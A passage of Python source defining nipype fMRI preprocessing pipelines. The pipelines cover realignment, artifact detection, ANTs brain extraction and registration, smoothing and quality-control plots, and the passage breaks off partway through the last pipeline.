    # Plot normalization Check
    plot_normalization_check = Node(interface=Plot_Coregistration_Montage(), name="plot_normalization_check")
    plot_normalization_check.inputs.canonical_img = canonical_file

    # Plot QA
    plot_qa = Node(Plot_Quality_Control(), name="plot_qa")

    # Create Mask
    compute_mask = Node(interface=ComputeMask(), name="compute_mask")
    # remove lower 5% of histogram of mean image
    compute_mask.inputs.m = .05

    # Smooth
    # implicit masking (.im) = 0, dtype = 0
    smooth = Node(interface=spm.Smooth(), name="smooth")
    smooth.inputs.fwhm = 6

    # Create Covariate matrix
    make_cov = Node(interface=Create_Covariates(), name="make_cov")

    # Create a datasink to clean up output files
    datasink = Node(interface=nio.DataSink(), name='datasink')
    datasink.inputs.base_directory = output_dir
    datasink.inputs.container = subject_id

    ########################################
    # Create Workflow
    ########################################

    workflow = Workflow(name='Preprocessed')
    workflow.base_dir = os.path.join(base_dir, subject_id)
    # Wiring: dcm2nii conversion -> AP/PA merge -> topup estimation -> trim ->
    # apply_topup -> abs -> gunzip -> realign -> coregister/normalize -> smooth,
    # with QA plots, artifact detection, and covariates branching off realign,
    # and key outputs routed to the datasink.
    workflow.connect([(datasource, ap_dcm2nii, [('ap', 'source_dir')]),
                      (datasource, pa_dcm2nii, [('pa', 'source_dir')]),
                      (datasource, s_dcm2nii, [('struct', 'source_dir')]),
                      (func_source, f_dcm2nii, [('scan', 'source_dir')]),
                      (ap_dcm2nii, merge_to_file_list, [('converted_files', 'in1')]),
                      (pa_dcm2nii, merge_to_file_list, [('converted_files', 'in2')]),
                      (merge_to_file_list, merger, [('out', 'in_files')]),
                      (merger, topup, [('merged_file', 'in_file')]),
                      (topup, apply_topup, [('out_fieldcoef', 'in_topup_fieldcoef'),
                                            ('out_movpar', 'in_topup_movpar')]),
                      (f_dcm2nii, trim, [('converted_files', 'in_file')]),
                      (trim, apply_topup, [('out_file', 'in_files')]),
                      (apply_topup, abs_maths, [('out_corrected', 'in_file')]),
                      (abs_maths, gunzip_func, [('out_file', 'in_file')]),
                      (gunzip_func, realign, [('out_file', 'in_files')]),
                      (s_dcm2nii, gunzip_struc, [('converted_files', 'in_file')]),
                      (gunzip_struc, coregister, [('out_file', 'source')]),
                      (coregister, normalize, [('coregistered_source', 'image_to_align')]),
                      (realign, plot_qa, [('realigned_files', 'dat_img')]),
                      (realign, coregister, [('mean_image', 'target'),
                                             ('realigned_files', 'apply_to_files')]),
                      (realign, normalize, [(('mean_image', get_vox_dims), 'write_voxel_sizes')]),
                      (coregister, normalize, [('coregistered_files', 'apply_to_files')]),
                      (normalize, smooth, [('normalized_files', 'in_files')]),
                      (realign, compute_mask, [('mean_image', 'mean_volume')]),
                      (compute_mask, art, [('brain_mask', 'mask_file')]),
                      (realign, art, [('realignment_parameters', 'realignment_parameters'),
                                      ('realigned_files', 'realigned_files')]),
                      (realign, plot_realign, [('realignment_parameters', 'realignment_parameters')]),
                      (normalize, plot_normalization_check, [('normalized_files', 'wra_img')]),
                      (realign, make_cov, [('realignment_parameters', 'realignment_parameters')]),
                      (art, make_cov, [('outlier_files', 'spike_id')]),
                      (normalize, datasink, [('normalized_files', 'structural.@normalize')]),
                      (coregister, datasink, [('coregistered_source', 'structural.@struct')]),
                      (topup, datasink, [('out_fieldcoef', 'distortion.@fieldcoef')]),
                      (topup, datasink, [('out_movpar', 'distortion.@movpar')]),
                      (smooth, datasink, [('smoothed_files', 'functional.@smooth')]),
                      (plot_realign, datasink, [('plot', 'functional.@plot_realign')]),
                      (plot_normalization_check, datasink, [('plot', 'functional.@plot_normalization')]),
                      (plot_qa, datasink, [('plot', 'functional.@plot_qa')]),
                      (make_cov, datasink, [('covariates', 'functional.@covariates')])])
    return workflow
def TV_Preproc_Pipeline_OLD(base_dir=None, output_dir=None, subject_id=None, spm_path=None):
""" Create a preprocessing workflow for the Couples Conflict Study using nipype
Args:
base_dir: path to data folder where raw subject folder is located
output_dir: path to where key output files should be saved
subject_id: subject_id (str)
spm_path: path to spm folder
Returns:
workflow: a nipype workflow that can be run
"""
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from nipype.interfaces.utility import Merge as Merge_List
from nipype.pipeline.engine import Node, Workflow
from nipype.interfaces.fsl.maths import UnaryMaths
from nipype.interfaces.nipy.preprocess import Trim
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces import spm
from nipype.interfaces.spm import Normalize12
from nipype.algorithms.misc import Gunzip
from nipype.interfaces.nipy.preprocess import ComputeMask
import nipype.interfaces.matlab as mlab
from cosanlab_preproc.utils import get_resource_path, get_vox_dims, get_n_volumes
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Realignment_Parameters, Create_Covariates, Plot_Quality_Control
import os
import glob
########################################
## Setup Paths and Nodes
########################################
# Specify Paths
canonical_file = os.path.join(spm_path,'canonical','single_subj_T1.nii')
template_file = os.path.join(spm_path,'tpm','TPM.nii')
# Set the way matlab should be called
mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash")
mlab.MatlabCommand.set_default_paths(spm_path)
# Get File Names for different types of scans. Parse into separate processing streams
datasource = Node(interface=nio.DataGrabber(infields=['subject_id'], outfields=[
'struct', 'func']),name='datasource')
datasource.inputs.base_directory = base_dir
datasource.inputs.template = '*'
datasource.inputs.field_template = {'struct':'%s/T1.nii.gz',
'func':'%s/*ep*.nii.gz'}
datasource.inputs.template_args = {'struct':[['subject_id']],
'func':[['subject_id']]}
datasource.inputs.subject_id = subject_id
datasource.inputs.sort_filelist=True
# iterate over functional scans to define paths
func_source = Node(interface=util.IdentityInterface(fields=['scan']),name="func_source")
func_source.iterables = ('scan', glob.glob(os.path.join(base_dir,subject_id,'*ep*nii.gz')))
########################################
## Preprocessing
########################################
# Trim - remove first 5 TRs
n_vols = 5
trim = Node(interface = Trim(), name='trim')
trim.inputs.begin_index=n_vols
#Realignment - 6 parameters - realign to first image of very first series.
realign = Node(interface=spm.Realign(), name="realign")
realign.inputs.register_to_mean = True
#Coregister - 12 parameters
coregister = Node(interface=spm.Coregister(), name="coregister")
coregister.inputs.jobtype = 'estwrite'
#Plot Realignment
plot_realign = Node(interface=Plot_Realignment_Parameters(), name="plot_realign")
#Artifact Detection
art = Node(interface=ArtifactDetect(), name="art")
art.inputs.use_differences = [True,False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'SPM'
# Gunzip - unzip the functional and structural images
gunzip_struc = Node(Gunzip(), name="gunzip_struc")
gunzip_func = Node(Gunzip(), name="gunzip_func")
# Normalize - normalizes functional and structural images to the MNI template
normalize = Node(interface=Normalize12(jobtype='estwrite',tpm=template_file),
name="normalize")
#Plot normalization Check
plot_normalization_check = Node(interface=Plot_Coregistration_Montage(), name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = canonical_file
#Plot QA
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
#Create Mask
compute_mask = Node(interface=ComputeMask(), name="compute_mask")
#remove lower 5% of histogram of mean image
compute_mask.inputs.m = .05
#Smooth
#implicit masking (.im) = 0, dtype = 0
smooth = Node(interface=spm.Smooth(), name = "smooth")
smooth.inputs.fwhm=6
#Create Covariate matrix
make_cov = Node(interface=Create_Covariates(), name="make_cov")
#Plot Quality Control Check
quality_control = Node(interface=Plot_Quality_Control(), name='quality_control')
# Create a datasink to clean up output files
datasink = Node(interface=nio.DataSink(), name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
########################################
# Create Workflow
########################################
workflow = Workflow(name = 'Preprocessed')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([(datasource, gunzip_struc,[('struct','in_file')]),
(func_source, trim,[('scan','in_file')]),
(trim, gunzip_func,[('out_file','in_file')]),
(gunzip_func, realign, [('out_file', 'in_files')]),
(realign, quality_control, [('realigned_files', 'dat_img')]),
(gunzip_struc,coregister, [('out_file', 'source')]),
(coregister, normalize,[('coregistered_source','image_to_align')]),
(realign,coregister, [('mean_image', 'target'),
('realigned_files', 'apply_to_files')]),
(realign,normalize, [(('mean_image', get_vox_dims), 'write_voxel_sizes')]),
(coregister,normalize, [('coregistered_files', 'apply_to_files')]),
(normalize, smooth, [('normalized_files', 'in_files')]),
(realign, compute_mask, [('mean_image','mean_volume')]),
(compute_mask,art,[('brain_mask','mask_file')]),
(realign,art,[('realignment_parameters','realignment_parameters'),
('realigned_files','realigned_files')]),
(realign,plot_realign, [('realignment_parameters', 'realignment_parameters')]),
(normalize, plot_normalization_check, [('normalized_files', 'wra_img')]),
(realign, make_cov, [('realignment_parameters', 'realignment_parameters')]),
(art, make_cov, [('outlier_files', 'spike_id')]),
(normalize, datasink, [('normalized_files', 'structural.@normalize')]),
(coregister, datasink, [('coregistered_source', 'structural.@struct')]),
(smooth, datasink, [('smoothed_files', 'functional.@smooth')]),
(plot_realign, datasink, [('plot', 'functional.@plot_realign')]),
(plot_normalization_check, datasink, [('plot', 'functional.@plot_normalization')]),
(make_cov, datasink, [('covariates', 'functional.@covariates')]),
(quality_control, datasink, [('plot', 'functional.@quality_control')])
])
return workflow
def TV_Preproc_Pipeline(base_dir=None, output_dir=None, resources_dir=None, subject_id=None, volsToTrim=5, smoothingKernel=4):
    """
    Create a nipype preprocessing workflow to analyze data from the TV study.
    THIS IS DESIGNED TO BE RUN IN A DOCKER CONTAINER WITH FSL AND ANTS
    Pre-processing steps include:
    Trimming extra scans (nipy)
    Realignment/Motion Correction (fsl)
    Artifact Detection (nipype)
    Brain Extraction + Bias Correction (ANTs)
    Coregistration (rigid) (ANTs)
    Normalization to MNI 152 2mm (non-linear) (ANTs)
    Quality Control figure generation:
    - Realignment parameters
    - Quality check of mean signal, sd and frame differences
    - Normalization check
    Args:
        base_dir: path to raw data folder with subjects listed as sub-folders
        output_dir: path where final outputted files and figures should go
        resources_dir: path where template files for MNI and ANTs live
        subject_id: subject to run (should match folder name)
        volsToTrim: number of initial volumes dropped from each run (default 5)
        smoothingKernel: FSL smoothing sigma passed to fsl.utils.Smooth (default 4)
    Return:
        workflow: A complete nipype workflow
    """
    import os
    from glob import glob
    import matplotlib
    matplotlib.use('Agg')
    from nipype.interfaces.io import DataSink, DataGrabber
    from nipype.interfaces.utility import Merge, IdentityInterface
    from nipype.pipeline.engine import Node, Workflow
    from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates
    from cosanlab_preproc.utils import get_resource_path
    from nipype.interfaces.nipy.preprocess import Trim, ComputeMask
    from nipype.algorithms.rapidart import ArtifactDetect
    from nipype.interfaces.ants.segmentation import BrainExtraction
    from nipype.interfaces.ants import Registration, ApplyTransforms
    from nipype.interfaces.fsl import MCFLIRT
    from nipype.interfaces.fsl.maths import MeanImage
    from nipype.interfaces.fsl.utils import Smooth

    ###################################
    ### GLOBALS, PATHS ###
    ###################################
    # BUGFIX: get_resource_path is a function and must be *called* (as the other
    # pipelines in this module do); joining the bare function object used to
    # raise a TypeError the first time this pipeline was built.
    MNItemplate = os.path.join(get_resource_path(), 'MNI152_T1_2mm_brain.nii.gz')
    MNItemplatehasskull = os.path.join(get_resource_path(), 'MNI152_T1_2mm.nii.gz')
    bet_ants_template = os.path.join(get_resource_path(), 'OASIS_template.nii.gz')
    bet_ants_prob_mask = os.path.join(get_resource_path(), 'OASIS_BrainCerebellumProbabilityMask.nii.gz')
    bet_ants_registration_mask = os.path.join(get_resource_path(), 'OASIS_BrainCerebellumRegistrationMask.nii.gz')
    # Currently unused but kept for parity with the full OASIS template set.
    bet_ants_extraction_mask = os.path.join(get_resource_path(), 'OASIS_BrainCerebellumExtractionMask.nii.gz')

    ###################################
    ### DATA INPUT ###
    ###################################
    # Create a datagrabber that takes a subid as input and creates func and struct dirs
    datasource = Node(DataGrabber(
        infields=['subject_id'],
        outfields=['func', 'struct']),
        name='datasource')
    datasource.inputs.base_directory = base_dir
    datasource.inputs.subject_id = subject_id
    datasource.inputs.template = '*'
    datasource.inputs.sort_filelist = True
    datasource.inputs.field_template = {'struct': '%s/T1.nii',
                                        'func': '%s/*ep*.nii'}
    datasource.inputs.template_args = {'struct': [['subject_id']],
                                       'func': [['subject_id']]}
    # Then grab all epis using an Identity Interface which is an iterable node
    func_scans = Node(IdentityInterface(fields=['scan']), name='func_scans')
    func_scans.inputs.subject_id = subject_id
    func_scans.iterables = ('scan', glob(os.path.join(base_dir, subject_id, '*ep*.nii')))

    ###################################
    ### TRIM ###
    ###################################
    trim = Node(Trim(), name='trim')
    trim.inputs.begin_index = volsToTrim

    ###################################
    ### REALIGN ###
    ###################################
    realign_fsl = Node(MCFLIRT(), name="realign")
    realign_fsl.inputs.cost = 'mutualinfo'
    realign_fsl.inputs.mean_vol = True
    realign_fsl.inputs.output_type = 'NIFTI_GZ'
    realign_fsl.inputs.save_mats = True
    realign_fsl.inputs.save_rms = True
    realign_fsl.inputs.save_plots = True

    ###################################
    ### MEAN EPIs ###
    ###################################
    # For coregistration after realignment
    mean_epi = Node(MeanImage(), name='mean_epi')
    mean_epi.inputs.dimension = 'T'
    # For after normalization is done to plot checks
    mean_norm_epi = Node(MeanImage(), name='mean_norm_epi')
    mean_norm_epi.inputs.dimension = 'T'

    ###################################
    ### MASK, ART, COV CREATION ###
    ###################################
    compute_mask = Node(ComputeMask(), name='compute_mask')
    # Remove lower 5% of the mean-image histogram when building the brain mask
    compute_mask.inputs.m = .05
    art = Node(ArtifactDetect(), name='art')
    art.inputs.use_differences = [True, False]
    art.inputs.use_norm = True
    art.inputs.norm_threshold = 1
    art.inputs.zintensity_threshold = 3
    art.inputs.mask_type = 'file'
    art.inputs.parameter_source = 'FSL'
    make_cov = Node(Create_Covariates(), name='make_cov')

    ###################################
    ### BRAIN EXTRACTION ###
    ###################################
    brain_extraction_ants = Node(BrainExtraction(), name='brain_extraction')
    brain_extraction_ants.inputs.dimension = 3
    brain_extraction_ants.inputs.use_floatingpoint_precision = 1
    brain_extraction_ants.inputs.num_threads = 12
    brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
    brain_extraction_ants.inputs.brain_template = bet_ants_template
    brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask

    ###################################
    ### COREGISTRATION ###
    ###################################
    coregistration = Node(Registration(), name='coregistration')
    coregistration.inputs.float = False
    coregistration.inputs.output_transform_prefix = "meanEpi2highres"
    coregistration.inputs.transforms = ['Rigid']
    # NOTE(review): two parameter tuples for a single transform; ANTs uses the
    # first -- confirm the second entry is intentional before removing it.
    coregistration.inputs.transform_parameters = [(0.1,), (0.1,)]
    coregistration.inputs.number_of_iterations = [[1000, 500, 250, 100]]
    coregistration.inputs.dimension = 3
    coregistration.inputs.num_threads = 12
    coregistration.inputs.write_composite_transform = True
    coregistration.inputs.collapse_output_transforms = True
    coregistration.inputs.metric = ['MI']
    coregistration.inputs.metric_weight = [1]
    coregistration.inputs.radius_or_number_of_bins = [32]
    coregistration.inputs.sampling_strategy = ['Regular']
    coregistration.inputs.sampling_percentage = [0.25]
    coregistration.inputs.convergence_threshold = [1.e-8]
    coregistration.inputs.convergence_window_size = [10]
    coregistration.inputs.smoothing_sigmas = [[3, 2, 1, 0]]
    coregistration.inputs.sigma_units = ['mm']
    coregistration.inputs.shrink_factors = [[8, 4, 2, 1]]
    coregistration.inputs.use_estimate_learning_rate_once = [True]
    coregistration.inputs.use_histogram_matching = [False]
    coregistration.inputs.initial_moving_transform_com = True
    coregistration.inputs.output_warped_image = True
    coregistration.inputs.winsorize_lower_quantile = 0.01
    coregistration.inputs.winsorize_upper_quantile = 0.99

    ###################################
    ### NORMALIZATION ###
    ###################################
    # ANTS steps through several different iterations starting with linear, affine
    # and finally non-linear diffeomorphic alignment. The settings below increase
    # the run time but yield a better alignment solution
    normalization = Node(Registration(), name='normalization')
    normalization.inputs.float = False
    normalization.inputs.collapse_output_transforms = True
    normalization.inputs.convergence_threshold = [1e-06]
    normalization.inputs.convergence_window_size = [10]
    normalization.inputs.dimension = 3
    normalization.inputs.fixed_image = MNItemplate  # MNI 152 2mm brain
    normalization.inputs.initial_moving_transform_com = True
    normalization.inputs.metric = ['MI', 'MI', 'CC']
    normalization.inputs.metric_weight = [1.0] * 3
    normalization.inputs.number_of_iterations = [[1000, 500, 250, 100],
                                                 [1000, 500, 250, 100],
                                                 [100, 70, 50, 20]]
    normalization.inputs.num_threads = 12
    normalization.inputs.output_transform_prefix = 'anat2template'
    normalization.inputs.output_inverse_warped_image = True
    normalization.inputs.output_warped_image = True
    normalization.inputs.radius_or_number_of_bins = [32, 32, 4]
    normalization.inputs.sampling_percentage = [0.25, 0.25, 1]
    normalization.inputs.sampling_strategy = ['Regular',
                                              'Regular',
                                              'None']
    normalization.inputs.shrink_factors = [[8, 4, 2, 1]] * 3
    normalization.inputs.sigma_units = ['vox'] * 3
    normalization.inputs.smoothing_sigmas = [[3, 2, 1, 0]] * 3
    normalization.inputs.terminal_output = 'stream'
    normalization.inputs.transforms = ['Rigid', 'Affine', 'SyN']
    normalization.inputs.transform_parameters = [(0.1,),
                                                 (0.1,),
                                                 (0.1, 3.0, 0.0)]
    normalization.inputs.use_histogram_matching = True
    normalization.inputs.winsorize_lower_quantile = 0.005
    normalization.inputs.winsorize_upper_quantile = 0.995
    normalization.inputs.write_composite_transform = True

    ###################################
    ### APPLY TRANSFORMS AND SMOOTH ###
    ###################################
    # The nodes above compute the required transformation matrices but don't
    # actually apply them to the data. Here we're merging both matrices and
    # applying them in a single transformation step to reduce the amount of
    # data interpolation.
    merge_transforms = Node(Merge(2), iterfield=['in2'], name='merge_transforms')
    apply_transforms = Node(ApplyTransforms(), iterfield=['input_image'], name='apply_transforms')
    apply_transforms.inputs.input_image_type = 3
    apply_transforms.inputs.float = False
    apply_transforms.inputs.num_threads = 12
    apply_transforms.inputs.environ = {}
    apply_transforms.inputs.interpolation = 'BSpline'
    apply_transforms.inputs.invert_transform_flags = [False, False]
    apply_transforms.inputs.terminal_output = 'stream'
    apply_transforms.inputs.reference_image = MNItemplate
    # Use FSL for smoothing
    smooth = Node(Smooth(), name='smooth')
    smooth.inputs.sigma = smoothingKernel

    ###################################
    ### PLOTS ###
    ###################################
    plot_realign = Node(Plot_Realignment_Parameters(), name="plot_realign")
    plot_qa = Node(Plot_Quality_Control(), name="plot_qa")
    plot_normalization_check = Node(Plot_Coregistration_Montage(), name="plot_normalization_check")
    plot_normalization_check.inputs.canonical_img = MNItemplatehasskull

    ###################################
    ### DATA OUTPUT ###
    ###################################
    # Collect all final outputs in the output dir and get rid of file name additions
    datasink = Node(DataSink(), name='datasink')
    datasink.inputs.base_directory = output_dir
    datasink.inputs.container = subject_id
    datasink.inputs.substitutions = [('_scan_..data..fmriData..' + subject_id + '..', '')]

    ###################################
    ### HOOK IT ALL CAPTAIN! ###
    ###################################
    workflow = Workflow(name='Preprocessing')
    workflow.base_dir = os.path.join(base_dir, subject_id)
    workflow.connect([
        (func_scans, trim, [('scan', 'in_file')]),
        (trim, realign_fsl, [('out_file', 'in_file')]),
        (realign_fsl, plot_realign, [('par_file', 'realignment_parameters')]),
        (realign_fsl, plot_qa, [('out_file', 'dat_img')]),
        (realign_fsl, art, [('out_file', 'realigned_files'),
                            ('par_file', 'realignment_parameters')]),
        (realign_fsl, mean_epi, [('out_file', 'in_file')]),
        (realign_fsl, make_cov, [('par_file', 'realignment_parameters')]),
        (mean_epi, compute_mask, [('out_file', 'mean_volume')]),
        (compute_mask, art, [('brain_mask', 'mask_file')]),
        (art, make_cov, [('outlier_files', 'spike_id')]),
        (datasource, brain_extraction_ants, [('struct', 'anatomical_image')]),
        (brain_extraction_ants, coregistration, [('BrainExtractionBrain', 'fixed_image')]),
        (mean_epi, coregistration, [('out_file', 'moving_image')]),
        (brain_extraction_ants, normalization, [('BrainExtractionBrain', 'moving_image')]),
        (coregistration, merge_transforms, [('composite_transform', 'in2')]),
        (normalization, merge_transforms, [('composite_transform', 'in1')]),
        (merge_transforms, apply_transforms, [('out', 'transforms')]),
        (realign_fsl, apply_transforms, [('out_file', 'input_image')]),
        (apply_transforms, mean_norm_epi, [('output_image', 'in_file')]),
        (mean_norm_epi, plot_normalization_check, [('out_file', 'wra_img')]),
        (apply_transforms, datasink, [('output_image', 'functional.@normalize')]),
        (apply_transforms, smooth, [('output_image', 'in_file')]),
        (smooth, datasink, [('smoothed_file', 'functional.@smooth')]),
        (plot_realign, datasink, [('plot', 'functional.@plot_realign')]),
        (plot_qa, datasink, [('plot', 'functional.@plot_qa')]),
        (plot_normalization_check, datasink, [('plot', 'functional.@plot_normalization')]),
        (make_cov, datasink, [('covariates', 'functional.@covariates')]),
        (brain_extraction_ants, datasink, [('BrainExtractionBrain', 'structural.@struct')]),
        (normalization, datasink, [('warped_image', 'structural.@normalize')])
    ])
    # Write a workflow graph figure once per output directory for documentation.
    if not os.path.exists(os.path.join(output_dir, 'Preprocsteps.png')):
        workflow.write_graph(dotfilename=os.path.join(output_dir, 'Preprocsteps'), format='png')
    return workflow
def ScanParams_Preproc_Pipeline(base_dir=None, output_dir=None, subject_id=None, smoothingKernel=4):
"""
Create a nipype preprocessing workflow to analyze data from the scanParams testing acquisitions.
THIS IS DESIGNED TO BE RUN IN A DOCKER CONTAINER WITH FSL AND ANTS
Pre-processing steps include:
Realignment/Motion Correction (fsl)
Artifact Detection (nipype)
Brain Extraction + Bias Correction (ANTs)
Coregistration (rigid) (ANTs)
Normalization to MNI 152 2mm (non-linear) (ANTs)
Quality Control figure generation:
- Realignment parameters
- Quality check of mean signal, sd and frame differences
- Normalization check
Makes 3 design matrices: standard block design (Right, Left), "mvpa" design (R1, R2, R3, L1, L2,L3), contrast block (R-L)
Fits 3 first level models (REQUIRES NLTOOLS!)
Args:
base_dir: path to raw data folder with subjects listed as sub-folders
output_dir: path where final outputted files and figures should go
resources_dir: path where template files for MNI and ANTs live
subject_id: subject to run (should match folder name)
Return:
workflow: A complete nipype workflow
"""
import os
from glob import glob
import matplotlib
matplotlib.use('Agg')
from nipype.interfaces.io import DataSink, DataGrabber
from nipype.interfaces.utility import Merge, IdentityInterface, Function
from nipype.pipeline.engine import Node, Workflow
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates, Build_Xmat, GLM
from cosanlab_preproc.utils import get_resource_path
from nipype.interfaces.nipy.preprocess import ComputeMask
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces.ants.segmentation import BrainExtraction
from nipype.interfaces.ants import Registration, ApplyTransforms
from nipype.interfaces.fsl import MCFLIRT
from nipype.interfaces.fsl.maths import MeanImage
from nipype.interfaces.fsl.utils import Smooth
###################################
### GLOBALS, PATHS ###
###################################
MNItemplate = os.path.join(get_resource_path(),'MNI152_T1_2mm_brain.nii.gz')
MNItemplatehasskull = os.path.join(get_resource_path(),'MNI152_T1_2mm.nii.gz')
bet_ants_template = os.path.join(get_resource_path(),'OASIS_template.nii.gz')
bet_ants_prob_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumProbabilityMask.nii.gz')
bet_ants_registration_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumRegistrationMask.nii.gz')
#bet_ants_extraction_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumExtractionMask.nii.gz')
###################################
### DATA INPUT ###
###################################
#Create a datagrabber that takes a subid as input and creates func and struct dirs
datasource = Node(DataGrabber(
infields=['subject_id'],
outfields = ['func','struct']),
name = 'datasource')
datasource.inputs.base_directory = base_dir
datasource.inputs.subject_id = subject_id
datasource.inputs.template = '*'
datasource.inputs.sort_filelist = True
datasource.inputs.field_template = {'struct': '%s/T1.nii.gz',
'func': '%s/*mm.nii.gz'}
datasource.inputs.template_args = {'struct' :[['subject_id']],
'func': [['subject_id']]}
#Then grab all epis using an Identity Interface which is an iterable node
func_scans = Node(IdentityInterface(fields=['scan']),name='func_scans')
func_scans.inputs.subject_id = subject_id
func_scans.iterables = ('scan', glob(os.path.join(base_dir,subject_id,'*mm.nii.gz')))
###################################
### TR GRABBER ###
###################################
def getTR(fName):
    """Return the scan's TR in seconds, read from the NIfTI header.

    The value is rounded to millisecond precision.
    """
    import nibabel as nib
    zooms = nib.load(fName).header.get_zooms()
    # The final zoom entry is the temporal dimension (the TR).
    return round(zooms[-1] * 1000) / 1000
get_tr = Node(interface=Function(input_names=['fName'],
output_names=['TR'],
function=getTR),
name='get_tr')
###################################
### ONSETS GRABBER ###
###################################
def getOnsets(fName):
    """Return the path of the onsets .txt file paired with a .nii.gz scan.

    Assumes the text file sits in the same directory and shares the scan's
    basename (everything before '.nii.gz').
    """
    import os
    folder, base = os.path.split(fName)
    stem = base.split('.nii.gz')[0]
    return os.path.join(folder, stem + '.txt')
get_onsets = Node(interface=Function(input_names=['fName'],
output_names=['onsetsFile'],
function=getOnsets),
name='get_onsets')
###################################
### REALIGN ###
###################################
realign_fsl = Node(MCFLIRT(),name="realign")
realign_fsl.inputs.cost = 'mutualinfo'
realign_fsl.inputs.mean_vol = True
realign_fsl.inputs.output_type = 'NIFTI_GZ'
realign_fsl.inputs.save_mats = True
realign_fsl.inputs.save_rms = True
realign_fsl.inputs.save_plots = True
###################################
### MEAN EPIs ###
###################################
#For coregistration after realignment
mean_epi = Node(MeanImage(),name='mean_epi')
mean_epi.inputs.dimension = 'T'
#For after normalization is done to plot checks
mean_norm_epi = Node(MeanImage(),name='mean_norm_epi')
mean_norm_epi.inputs.dimension = 'T'
###################################
### MASK, ART, COV CREATION ###
###################################
compute_mask = Node(ComputeMask(), name='compute_mask')
compute_mask.inputs.m = .05
art = Node(ArtifactDetect(),name='art')
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'FSL'
make_cov = Node(Create_Covariates(),name='make_cov')
###################################
### BRAIN EXTRACTION ###
###################################
brain_extraction_ants = Node(BrainExtraction(),name='brain_extraction')
brain_extraction_ants.inputs.dimension = 3
brain_extraction_ants.inputs.use_floatingpoint_precision = 1
brain_extraction_ants.inputs.num_threads = 12
brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
brain_extraction_ants.inputs.keep_temporary_files = 1
brain_extraction_ants.inputs.brain_template = bet_ants_template
brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask
###################################
### COREGISTRATION ###
###################################
coregistration = Node(Registration(), name='coregistration')
coregistration.inputs.float = False
coregistration.inputs.output_transform_prefix = "meanEpi2highres"
coregistration.inputs.transforms = ['Rigid']
coregistration.inputs.transform_parameters = [(0.1,), (0.1,)]
coregistration.inputs.number_of_iterations = [[1000,500,250,100]]
coregistration.inputs.dimension = 3
coregistration.inputs.num_threads = 12
coregistration.inputs.write_composite_transform = True
coregistration.inputs.collapse_output_transforms = True
coregistration.inputs.metric = ['MI']
coregistration.inputs.metric_weight = [1]
coregistration.inputs.radius_or_number_of_bins = [32]
coregistration.inputs.sampling_strategy = ['Regular']
coregistration.inputs.sampling_percentage = [0.25]
coregistration.inputs.convergence_threshold = [1.e-8]
coregistration.inputs.convergence_window_size = [10]
coregistration.inputs.smoothing_sigmas = [[3,2,1,0]]
coregistration.inputs.sigma_units = ['mm']
coregistration.inputs.shrink_factors = [[8,4,2,1]]
coregistration.inputs.use_estimate_learning_rate_once = [True]
coregistration.inputs.use_histogram_matching = [False]
coregistration.inputs.initial_moving_transform_com = True
coregistration.inputs.output_warped_image = True
coregistration.inputs.winsorize_lower_quantile = 0.01
coregistration.inputs.winsorize_upper_quantile = 0.99
###################################
### NORMALIZATION ###
###################################
#ANTS step through several different iterations starting with linear, affine and finally non-linear diffuseomorphic alignment. The settings below increase the run time but yield a better alignment solution
normalization = Node(Registration(),name='normalization')
normalization.inputs.float = False
normalization.inputs.collapse_output_transforms=True
normalization.inputs.convergence_threshold=[1e-06]
normalization.inputs.convergence_window_size=[10]
normalization.inputs.dimension = 3
normalization.inputs.fixed_image = MNItemplate #MNI 152 1mm
normalization.inputs.initial_moving_transform_com=True
normalization.inputs.metric=['MI', 'MI', 'CC']
normalization.inputs.metric_weight=[1.0]*3
normalization.inputs.number_of_iterations=[[1000, 500, 250, 100],
[1000, 500, 250, 100],
[100, 70, 50, 20]]
normalization.inputs.num_threads=12
normalization.inputs.output_transform_prefix = 'anat2template'
normalization.inputs.output_inverse_warped_image=True
normalization.inputs.output_warped_image = True
normalization.inputs.radius_or_number_of_bins=[32, 32, 4]
normalization.inputs.sampling_percentage=[0.25, 0.25, 1]
normalization.inputs.sampling_strategy=['Regular',
'Regular',
'None']
normalization.inputs.shrink_factors=[[8, 4, 2, 1]]*3
normalization.inputs.sigma_units=['vox']*3
normalization.inputs.smoothing_sigmas=[[3, 2, 1, 0]]*3
normalization.inputs.terminal_output='stream'
normalization.inputs.transforms = ['Rigid','Affine','SyN']
normalization.inputs.transform_parameters=[(0.1,),
(0.1,),
(0.1, 3.0, 0.0)]
normalization.inputs.use_histogram_matching=True
normalization.inputs.winsorize_lower_quantile=0.005
normalization.inputs.winsorize_upper_quantile=0.995
normalization.inputs.write_composite_transform=True
###################################
### APPLY TRANSFORMS AND SMOOTH ###
###################################
#The nodes above compute the required transformation matrices but don't actually apply them to the data. Here we're merging both matrices and applying them in a single transformation step to reduce the amount of data interpolation.
merge_transforms = Node(Merge(2), iterfield=['in2'], name ='merge_transforms')
apply_transforms = Node(ApplyTransforms(),iterfield=['input_image'],name='apply_transforms')
apply_transforms.inputs.input_image_type = 3
apply_transforms.inputs.float = False
apply_transforms.inputs.num_threads = 12
apply_transforms.inputs.environ = {}
